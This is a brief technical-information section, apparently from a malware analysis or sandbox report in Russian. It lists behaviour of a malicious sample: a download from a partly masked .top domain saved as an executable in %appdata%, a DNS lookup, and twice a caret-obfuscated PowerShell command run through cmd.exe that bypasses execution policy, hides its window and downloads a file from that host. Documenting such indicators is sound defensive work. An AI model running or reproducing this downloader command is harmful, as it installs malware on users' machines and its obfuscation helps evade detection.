Техническая информация
- http://www.do###sope.top/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pO^werSh^ElL^.EX^e -^e^XEcuTIOn^Po^l^I^cy bYpa^S^S -NOPr^oF^I^lE^ -w^IN^DoWsTyL^e hi^DDen (^ne^W-OB^jE^Ct Sy^St^EM^.NEt^.^W^eBc^liENT^).doW^N^LoadFILE('http://www.do###sope...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "pO^werSh^ElL^.EX^e -^e^XEcuTIOn^Po^l^I^cy bYpa^S^S -NOPr^oF^I^lE^ -w^IN^DoWsTyL^e hi^DDen (^ne^W-OB^jE^Ct Sy^St^EM^.NEt^.^W^eBc^liENT^).doW^N^LoadFILE('http://www.do###sope...' (со скрытым окном)